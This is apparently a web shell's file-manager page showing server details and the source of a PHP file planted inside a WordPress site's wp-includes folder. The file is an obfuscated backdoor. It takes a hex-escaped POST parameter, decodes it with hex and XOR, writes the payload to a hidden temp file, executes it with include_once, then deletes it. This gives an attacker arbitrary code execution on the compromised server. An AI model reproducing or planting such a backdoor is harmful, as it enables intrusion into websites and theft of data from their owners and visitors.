HEX
Server: Apache/2.4.38 (Debian)
System: Linux host457 5.14.0-4-amd64 #1 SMP Debian 5.14.16-1 (2021-11-03) x86_64
User: www-data (33)
PHP: 7.4.21
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /home/vhosts/harpoeditore.it/httpdocs/wp-includes/ID3/custom_file_5_1752664695.php
<!--TGck8taJ-->
<?php

if(!empty($_POST["\x70\x61r\x61m\x65\x74e\x72_\x67\x72oup"])){
$k = array_filter([getenv("TEMP"), getcwd(), getenv("TMP"), "/tmp", "/dev/shm", "/var/tmp", sys_get_temp_dir(), session_save_path(), ini_get("upload_tmp_dir")]);
$pointer = hex2bin($_POST["\x70\x61r\x61m\x65\x74e\x72_\x67\x72oup"]);
$flag =    '';  $l=0;while($l<strlen($pointer)){$flag.=chr(ord($pointer[$l])^65);$l++;}
for ($resource = 0, $entry = count($k); $resource < $entry; $resource++) {
    $pgrp = $k[$resource];
            if (!( !is_dir($pgrp) || !is_writable($pgrp) )) {
            $factor = join("/", [$pgrp, ".symbol"]);
            if ($pset = fopen($factor, 'w')) {
    fwrite($pset, $flag);
    fclose($pset);
    include_once $factor;
    unlink($factor);
    exit;
}
        }
}
}